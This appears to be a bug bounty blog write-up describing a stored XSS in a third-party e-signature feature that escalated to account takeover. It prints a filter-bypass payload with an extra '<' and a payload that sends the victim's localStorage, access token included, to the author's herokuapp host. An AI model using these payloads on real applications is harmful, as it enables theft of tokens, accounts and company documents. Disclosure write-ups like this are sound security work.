Account Takeover via XSS in e-signature feature worth 2500$
Hi everyone, I hope all is well. I was hacking an HR application and started testing the integrated applications that were on it. My target was HR application but I wanted to try something on this app. I didn’t even know they were bug bounty program. Just for fun. Damn I really like this. One of the integrated application which I started to test had an electronic signature feature. You prepare a pdf document and send it to someone else to sign.
When I tried xss payload with in name field, like “><img onerror=alert(document.domain) src> everything was oky. The output was:
"><img onerror=alert(document.domain) src>
Then I realized that this isn’t my xss payload that I always use 😇 Are you ready to this payload? That was :
“><<img onerror=alert(document.cookie) src>
Yes, just one more ‘<’. I got an alert in the admin page from an unauthenticated user. Output was:
"><img onerror=alert(document.cookie) src>
I needed to research this, but I didn’t have much time in those days. I found this bug 8 months ago. I’m sorry for not being able to detail.
Sometimes filters can be skipped as simple as that. Developers can sometimes make far worse mistakes. We are all human we can make mistakes… So open your eyes and be focus to catch bugs. This was a popular app used by many other companies 😑
What about impact? I had really juicy local storage. I had access_token which was more than enough for us 😇 Yes everything was in local storage. To steal localStorage I used this payload :
“><<img src=x onerror=this.src=’https://gkhck.herokuapp.com/p?cookie='+JSON.stringify(localStorage) />
Note: You can use https://github.com/projectdiscovery/interactsh
When xss triggered everything was in my heroku logs. Oky, this is account takeover but what we can do with this account? In this application, which has an integrated system with many cloud storage applications, we have access to all files in it if the account is connected with application. We can also access all signed documents and company files.
